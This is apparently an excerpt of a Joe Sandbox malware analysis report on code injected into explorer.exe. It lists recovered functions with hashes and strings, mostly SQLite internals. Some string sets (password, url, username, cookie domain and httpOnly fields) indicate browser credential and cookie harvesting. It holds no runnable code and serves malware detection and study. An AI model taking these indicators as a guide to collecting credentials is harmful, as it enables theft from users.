                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _cwprintf_s_l
                                                                                                                                                                                • String ID: AND $ USING $ USING INTEGER PRIMARY KEY (rowid%s?)$ VIRTUAL TABLE INDEX %d:%s$%s %S$%s=?$<expr>$>? AND rowid<$ANY(%s)$AUTOMATIC COVERING INDEX$AUTOMATIC PARTIAL COVERING INDEX$COVERING INDEX %s$INDEX %s$PRIMARY KEY$SCAN$SEARCH$rowid
                                                                                                                                                                                • API String ID: 2941638530-490416837
                                                                                                                                                                                • Opcode ID: 5609d86a449eaa2262b028ce808655fa91b50ecdad568c82cf7356fd653c3910
                                                                                                                                                                                • Instruction ID: 07c2b28c7ce3403e24f4f1c0fa7659516cd768fe156af72324b77bff1ad7ae3e
                                                                                                                                                                                • Opcode Fuzzy Hash: 5609d86a449eaa2262b028ce808655fa91b50ecdad568c82cf7356fd653c3910
                                                                                                                                                                                • Instruction Fuzzy Hash: F6A1F132700B94D6EB10EB22FA407AD77A4F315BC8F980A16CE0E27B94DB39C945C755
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _cwprintf_s_l
                                                                                                                                                                                • String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$d$zeroblob(%d)
                                                                                                                                                                                • API String ID: 2941638530-2001737079
                                                                                                                                                                                • Opcode ID: 50dd37456a52db197c5fae96df0b8d6db7c1e1ee9478f8da2d6686cf9f3d2761
                                                                                                                                                                                • Instruction ID: 163ed552b4d91aee4bc5c39d000e554c4e7ea722fbbf556b14257748d83f87e3
                                                                                                                                                                                • Opcode Fuzzy Hash: 50dd37456a52db197c5fae96df0b8d6db7c1e1ee9478f8da2d6686cf9f3d2761
                                                                                                                                                                                • Instruction Fuzzy Hash: 57917BB2B28A8082CF11DF25F4507AD77A1F793788F84541AEB8A57B58DB79CC46CB00
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$Process$Free$Allocwcsftime
                                                                                                                                                                                • String ID: %d-%b-%Y %H:%M$---$fieldname$firstUsed$lastUsed$value
                                                                                                                                                                                • API String ID: 282520901-236714635
                                                                                                                                                                                • Opcode ID: 1de12c7d0cb95b7ece7bf5d447a49f8a81228d3a086856385e106a0d56572571
                                                                                                                                                                                • Instruction ID: 13c8735677bd80e2d104216e5a4ee048e0b261f1c7a03b259c3c69aacc357ece
                                                                                                                                                                                • Opcode Fuzzy Hash: 1de12c7d0cb95b7ece7bf5d447a49f8a81228d3a086856385e106a0d56572571
                                                                                                                                                                                • Instruction Fuzzy Hash: 49318035705F9581DA10DB52F84839973A1FB99BC0F98883E8E9D57B18EF38D954CB04
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$Free$Process$Local
                                                                                                                                                                                • String ID: ---$created$lastused$password$url$username
                                                                                                                                                                                • API String ID: 2715961324-3110003818
                                                                                                                                                                                • Opcode ID: ae9d1f1f0e981be0e8047b727b1816052377ad78c367984ab3025b14375946f1
                                                                                                                                                                                • Instruction ID: b8abefb8a24bf934571ad00d39a2469bad0773317f70ac1dc18967762ffad7b5
                                                                                                                                                                                • Opcode Fuzzy Hash: ae9d1f1f0e981be0e8047b727b1816052377ad78c367984ab3025b14375946f1
                                                                                                                                                                                • Instruction Fuzzy Hash: 69316D32705F9081DB20EF52F84879973A0FB85BE0F54462A9EAE57B64DF38D954CB00
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __swprintf_l
                                                                                                                                                                                • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$etilqs_$winGetTempname1$winGetTempname2$winGetTempname3$winGetTempname4$winGetTempname5
                                                                                                                                                                                • API String ID: 1488884202-2699532598
                                                                                                                                                                                • Opcode ID: 7a8548f552223943e98c00528f88b614907a5d4a950986092cde20e46adef6c8
                                                                                                                                                                                • Instruction ID: f8cdc3fe2b61c650f249f1b081ec7662673f1d0d0580a45181c88d1ed795c4bb
                                                                                                                                                                                • Opcode Fuzzy Hash: 7a8548f552223943e98c00528f88b614907a5d4a950986092cde20e46adef6c8
                                                                                                                                                                                • Instruction Fuzzy Hash: 1A812362B06A8846DB149F35F8103B97792EB46BD4F984A3ECD4A077A4EF3CC806C704
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __swprintf_l
                                                                                                                                                                                • String ID: %.16g$%02d$%03d$%04d$%06.3f
                                                                                                                                                                                • API String ID: 1488884202-3831070334
                                                                                                                                                                                • Opcode ID: fa064fcaccfdae2354fc556153a922cff0a0d82c64a8799bb3ab5dfd31a70b5c
                                                                                                                                                                                • Instruction ID: ec3df0f9c816170c8b10e9fcad97ad9e4f28ca133be80c609953e1d55da09c05
                                                                                                                                                                                • Opcode Fuzzy Hash: fa064fcaccfdae2354fc556153a922cff0a0d82c64a8799bb3ab5dfd31a70b5c
                                                                                                                                                                                • Instruction Fuzzy Hash: 97C179A5714EA482CF28CB99F9143A827A1E7467E4F44473ECE6A5B7D0DA79C942CB00
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0E6271AC: GetProcessHeap.KERNEL32 ref: 0E627248
                                                                                                                                                                                  • Part of subcall function 0E6271AC: HeapFree.KERNEL32 ref: 0E627256
                                                                                                                                                                                  • Part of subcall function 0E6271AC: GetProcessHeap.KERNEL32 ref: 0E62727F
                                                                                                                                                                                  • Part of subcall function 0E6271AC: HeapFree.KERNEL32 ref: 0E62728D
                                                                                                                                                                                  • Part of subcall function 0E6271AC: GetProcessHeap.KERNEL32 ref: 0E627298
                                                                                                                                                                                  • Part of subcall function 0E6271AC: HeapFree.KERNEL32 ref: 0E6272A6
                                                                                                                                                                                  • Part of subcall function 0E627DE8: GetProcessHeap.KERNEL32 ref: 0E627E29
                                                                                                                                                                                  • Part of subcall function 0E627DE8: HeapAlloc.KERNEL32 ref: 0E627E3B
                                                                                                                                                                                  • Part of subcall function 0E627DE8: wcsftime.LIBCMT ref: 0E627E5D
                                                                                                                                                                                  • Part of subcall function 0E6272C8: GetProcessHeap.KERNEL32 ref: 0E627334
                                                                                                                                                                                  • Part of subcall function 0E6272C8: HeapFree.KERNEL32 ref: 0E627342
                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0E625CC2
                                                                                                                                                                                • HeapFree.KERNEL32 ref: 0E625CD0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$Process$Free$Allocwcsftime
                                                                                                                                                                                • String ID: ---$domain$expirationDate$httpOnly$name$path$secure$value
                                                                                                                                                                                • API String ID: 282520901-2802279535
                                                                                                                                                                                • Opcode ID: d1ec7490254d0102a1585410d62295d2732f6c7770b558e991a1515002d652b2
                                                                                                                                                                                • Instruction ID: fa0d0de08ab86cdc16c89be26a9863bdabc044b054ebf14ed446b3fc08d6d2b6
                                                                                                                                                                                • Opcode Fuzzy Hash: d1ec7490254d0102a1585410d62295d2732f6c7770b558e991a1515002d652b2
                                                                                                                                                                                • Instruction Fuzzy Hash: 21316976705A9580EB00EF66F984B4833A0E799FC4F84982B8E1D67759CF38C924CB84
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • vtable constructor did not declare schema: %s, xrefs: 0E68BDBC
                                                                                                                                                                                • hidden, xrefs: 0E68BE53
                                                                                                                                                                                • vtable constructor failed: %s, xrefs: 0E68BD33
                                                                                                                                                                                • vtable constructor called recursively: %s, xrefs: 0E68BC1D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _cwprintf_s_l
                                                                                                                                                                                • String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
                                                                                                                                                                                • API String ID: 2941638530-1299490920
                                                                                                                                                                                • Opcode ID: fd1bc7608252aba962cd553326b50a5238d327f27d9ab182e13482d9eb423ec4
                                                                                                                                                                                • Instruction ID: a15c1e0b999528bfdbe9c2fc46dc82de0e73233f1cc54704a384b3f95468e2b6
                                                                                                                                                                                • Opcode Fuzzy Hash: fd1bc7608252aba962cd553326b50a5238d327f27d9ab182e13482d9eb423ec4
                                                                                                                                                                                • Instruction Fuzzy Hash: 20A1BA76219B8486CB24EF26E55036EB7A1F345BD4F44862ADF9E47B68DB38C842C740
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _cwprintf_s_l
                                                                                                                                                                                • String ID: %.*z:%u$column%d$false$rowid$true
                                                                                                                                                                                • API String ID: 2941638530-3661680367
                                                                                                                                                                                • Opcode ID: 7fa71a178b43cdd5856277ee50160a21cfa7a5a827e7bd5a9498b029d748e505
                                                                                                                                                                                • Instruction ID: 4846bcd39c5aa812c898b8dcaed8c5e7e16a59c7d7795b0aadec806132bf1772
                                                                                                                                                                                • Opcode Fuzzy Hash: 7fa71a178b43cdd5856277ee50160a21cfa7a5a827e7bd5a9498b029d748e505
                                                                                                                                                                                • Instruction Fuzzy Hash: B7711562319B9091DF25DF26B920B296B96FB86FC4F895929CEDA07344EF38CD41C304
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _cwprintf_s_l
                                                                                                                                                                                • String ID: %c"%s"$("%s"$,arg HIDDEN$,schema HIDDEN$CREATE TABLE x
                                                                                                                                                                                • API String ID: 2941638530-1792071301
                                                                                                                                                                                • Opcode ID: c9fa6860cb80aea7771500e6002ee90351d51ec80f6643827a84a0927192444b
                                                                                                                                                                                • Instruction ID: fa2f0980ad1953058c7223e95f2b82ea6b32b3b936dcfa7ca965d6cda555d8de
                                                                                                                                                                                • Opcode Fuzzy Hash: c9fa6860cb80aea7771500e6002ee90351d51ec80f6643827a84a0927192444b
                                                                                                                                                                                • Instruction Fuzzy Hash: B7513672214B8481DB21DF21F85039D77A1F749BD4F845A2ADAED037A8EF38C945CB40
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __swprintf_l
                                                                                                                                                                                • String ID: %!.15g$%!.20e$MZER$NULL
                                                                                                                                                                                • API String ID: 1488884202-4030369070
                                                                                                                                                                                • Opcode ID: eb2b0b9b9b7a309cfc3d2e3dc318bdd4f4228e9a6137dcc0387e0c4a8718bb92
                                                                                                                                                                                • Instruction ID: af0278aa0bf0043447c92f897d238de350ba8fc8433a58cdba7e54fba0269093
                                                                                                                                                                                • Opcode Fuzzy Hash: eb2b0b9b9b7a309cfc3d2e3dc318bdd4f4228e9a6137dcc0387e0c4a8718bb92
                                                                                                                                                                                • Instruction Fuzzy Hash: C5712362215BC484DB22DF25E4503AD7BA1F796B90F48A716DE9D47398DF3ECA06C300
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _cwprintf_s_l
                                                                                                                                                                                • String ID: %.16g$%lld$(blob)$NULL
                                                                                                                                                                                • API String ID: 2941638530-986291361
                                                                                                                                                                                • Opcode ID: f22c68f6cd2fea8ac68fee143df9f82b63fc6e2918f4eb671327fc0c9fcbf4a8
                                                                                                                                                                                • Instruction ID: 7c3b7b397cd90efe4b9d7d18890b00c55697740e934897a8e0b9ed774708f5ff
                                                                                                                                                                                • Opcode Fuzzy Hash: f22c68f6cd2fea8ac68fee143df9f82b63fc6e2918f4eb671327fc0c9fcbf4a8
                                                                                                                                                                                • Instruction Fuzzy Hash: 4F11E4A2726B10D0CF0DEB26F8543A86330B7257A8F945616EE3E172A4DB39CC87C340
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                • String ID: false$true
                                                                                                                                                                                • API String ID: 659108358-2658103896
                                                                                                                                                                                • Opcode ID: d2e97d7cc66964dd0b1dd8210baa7692f9e77128809fa8e0403741c2ad73e2fd
                                                                                                                                                                                • Instruction ID: b480e5e47eb98f5854c1719aa42d1f3c7ea143687b18f95bc69f7243001cbd34
                                                                                                                                                                                • Opcode Fuzzy Hash: d2e97d7cc66964dd0b1dd8210baa7692f9e77128809fa8e0403741c2ad73e2fd
                                                                                                                                                                                • Instruction Fuzzy Hash: 19215832604B9697DB00CF15F84439C73B0F758B84F94442ADB5A97B24EF35E9A6CB40
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$Alloc$Processlstrlen
                                                                                                                                                                                • String ID: 0123456789ABCDEF$null
                                                                                                                                                                                • API String ID: 1993427828-3621651984
                                                                                                                                                                                • Opcode ID: 03bf1d6267366d96bf37183e72ae7e0875848426fd2cc9b41a90b2399189fec6
                                                                                                                                                                                • Instruction ID: be5c146250315884b9b2fe53385a7e7db5048e08e649b8419e58f1f1652e6f12
                                                                                                                                                                                • Opcode Fuzzy Hash: 03bf1d6267366d96bf37183e72ae7e0875848426fd2cc9b41a90b2399189fec6
                                                                                                                                                                                • Instruction Fuzzy Hash: 2A817BB6710B60A7DB14EF12E25066D3371F798B94F500529CB4A43B64DB39E9F2CB90
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • CREATE VIRTUAL TABLE %T, xrefs: 0E68BA7F
                                                                                                                                                                                • name=%Q AND sql=%Q, xrefs: 0E68BB15
                                                                                                                                                                                • UPDATE %Q.sqlite_master SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d, xrefs: 0E68BAB7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _cwprintf_s_l
                                                                                                                                                                                • String ID: CREATE VIRTUAL TABLE %T$UPDATE %Q.sqlite_master SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d$name=%Q AND sql=%Q
                                                                                                                                                                                • API String ID: 2941638530-1834655836
                                                                                                                                                                                • Opcode ID: e10d02f9abfc35bb29dd7913b7426c593d435399f87a20beb36b73245fe21023
                                                                                                                                                                                • Instruction ID: 96bd129d1db36235b8991d67cb7f617ef27669a2d9ae34f54d8c335c48926f5a
                                                                                                                                                                                • Opcode Fuzzy Hash: e10d02f9abfc35bb29dd7913b7426c593d435399f87a20beb36b73245fe21023
                                                                                                                                                                                • Instruction Fuzzy Hash: 0951AE7670078086DB24EF26E5543A937A0F789FC8F44452ACF4A1BB18DF38C816C748
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _cwprintf_s_l
                                                                                                                                                                                • String ID: ,%s%s%s$BINARY$k(%d
                                                                                                                                                                                • API String ID: 2941638530-1903017921
                                                                                                                                                                                • Opcode ID: 03e037e1d4798844b9a098240c421a4cec523d8aeec8f3e1a746d58723442db2
                                                                                                                                                                                • Instruction ID: d63ef7f61faec88e1b33e3efc7a1a02f1090830a6c029aef366ece1bc2bea2b9
                                                                                                                                                                                • Opcode Fuzzy Hash: 03e037e1d4798844b9a098240c421a4cec523d8aeec8f3e1a746d58723442db2
                                                                                                                                                                                • Instruction Fuzzy Hash: DB216B62714A95D0DF0ADF61FD5479863A0F724B88FC44816CE0D67664EB79C946C350
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3659116390-0
                                                                                                                                                                                • Opcode ID: f21000b7e796fce9ac4fd47f297a8b58df74841418c2ead7fab5dee03a0028d4
                                                                                                                                                                                • Instruction ID: 2e92466a98cad7d52d23fd07f341e3be80b8ba7c75946b53ea6119a65362d616
                                                                                                                                                                                • Opcode Fuzzy Hash: f21000b7e796fce9ac4fd47f297a8b58df74841418c2ead7fab5dee03a0028d4
                                                                                                                                                                                • Instruction Fuzzy Hash: 9651DE72720A9089E710CF75E8803ED3BB4F359B9CF088115DE5A5BB58DB39C586C700
                                                                                                                                                                                APIs
                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 0E6C0AF5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                • Opcode ID: ec145869408d9b24f0ce45c1d2ce5335b0b267865e8d16d8a73bf751f7c65031
                                                                                                                                                                                • Instruction ID: 0f23d4944b19222b975076c8dd3419c21a6940e5e1c71e7e6cd93ef64ad651f2
                                                                                                                                                                                • Opcode Fuzzy Hash: ec145869408d9b24f0ce45c1d2ce5335b0b267865e8d16d8a73bf751f7c65031
                                                                                                                                                                                • Instruction Fuzzy Hash: D741F332218780C6CB648F25F4A4279BBA4FB52BA4F584329DFAA07794DB39C851C704
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$Process$Alloc$Free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1864747095-0
                                                                                                                                                                                • Opcode ID: db48302eed20ebdeccee4bdaa19b4f35b3f33b857b110d917d05c9474e493e63
                                                                                                                                                                                • Instruction ID: 8385dc4031d44dd68bbeb8645fcaa152fa105067d58fed8bf15c35fcc055571d
                                                                                                                                                                                • Opcode Fuzzy Hash: db48302eed20ebdeccee4bdaa19b4f35b3f33b857b110d917d05c9474e493e63
                                                                                                                                                                                • Instruction Fuzzy Hash: 5331CF31215B9286DB10CB26F81836A77A1EB4ABE0F184639DE5A43B54EF3DC806CB00
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$Process$AllocByteCharFreeMultiWidelstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1845772836-0
                                                                                                                                                                                • Opcode ID: 223fade5a447255304440d8eac879b319bd920a62f4356431a91c1133846b526
                                                                                                                                                                                • Instruction ID: 9f194ad5c2c6899b0923c9bc4ca010fe73e664e25e5e12b0ab9585667f085120
                                                                                                                                                                                • Opcode Fuzzy Hash: 223fade5a447255304440d8eac879b319bd920a62f4356431a91c1133846b526
                                                                                                                                                                                • Instruction Fuzzy Hash: 0521AF36611F9186EB108F26F80432DB7A1FB95BA4F584439CE8A93B24EF3CD4418B10
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _cwprintf_s_l
                                                                                                                                                                                • String ID: $$%s%s$x
                                                                                                                                                                                • API String ID: 2941638530-2761044349
                                                                                                                                                                                • Opcode ID: cae053a90deb2be5f9d50ec389c71e4c5100dd7bc7cf0c4216380ce3b6cf0f9e
                                                                                                                                                                                • Instruction ID: aae980520b7fd579788aed81eb4674c747f66cf6257e47c1354137779ca257aa
                                                                                                                                                                                • Opcode Fuzzy Hash: cae053a90deb2be5f9d50ec389c71e4c5100dd7bc7cf0c4216380ce3b6cf0f9e
                                                                                                                                                                                • Instruction Fuzzy Hash: B4B106A2705B8089DB25CF36F4903AC3BA1EB4ABA8F08552ADF9D57754DF39D881C314
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _cwprintf_s_l
                                                                                                                                                                                • String ID: "%w" $%Q%s
                                                                                                                                                                                • API String ID: 2941638530-1987291987
                                                                                                                                                                                • Opcode ID: 9f8b7b1a548b828a3804a01fa3feda63f83e0a8dec6e0120bab5bd226db62cdf
                                                                                                                                                                                • Instruction ID: 478b11210da58a19b3f95293e0beb01a419aa796484a1bb96a5b8f5e79093136
                                                                                                                                                                                • Opcode Fuzzy Hash: 9f8b7b1a548b828a3804a01fa3feda63f83e0a8dec6e0120bab5bd226db62cdf
                                                                                                                                                                                • Instruction Fuzzy Hash: A2810372725B9086CE14CF16F850269B7A5F786BE0F444629DFAA07B98DF38D855CB00
                                                                                                                                                                                Strings
                                                                                                                                                                                • %r , xrefs: 0E68AB2B
                                                                                                                                                                                • p, xrefs: 0E68A943
                                                                                                                                                                                • %sON CONFLICT clause does not match any PRIMARY KEY or UNIQUE constraint, xrefs: 0E68AB44
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: %r $%sON CONFLICT clause does not match any PRIMARY KEY or UNIQUE constraint$p
                                                                                                                                                                                • API String ID: 0-3371222869
                                                                                                                                                                                • Opcode ID: 57170a91ea0b2fcf3280d8095350824fa6592132257277059df7c8369fee4cca
                                                                                                                                                                                • Instruction ID: c5fb83e6f3547518894ae91155b46e72502ec66d275bd4e895f50bdd97dcf653
                                                                                                                                                                                • Opcode Fuzzy Hash: 57170a91ea0b2fcf3280d8095350824fa6592132257277059df7c8369fee4cca
                                                                                                                                                                                • Instruction Fuzzy Hash: 7981C172614B8086DB60EFA6F64079E77B5F349BD8F48821ADF9957B18DB38C891C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • trigger, xrefs: 0E686DF4
                                                                                                                                                                                • type='trigger' AND name='%q', xrefs: 0E686EF2
                                                                                                                                                                                • INSERT INTO %Q.sqlite_master VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q'), xrefs: 0E686EC8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _cwprintf_s_l
                                                                                                                                                                                • String ID: INSERT INTO %Q.sqlite_master VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')$trigger$type='trigger' AND name='%q'
                                                                                                                                                                                • API String ID: 2941638530-84837866
                                                                                                                                                                                • Opcode ID: e43615a15ceb2ab8a8dc3c6c51e537c0b4a0f9f018647123313b87ef4abcf15e
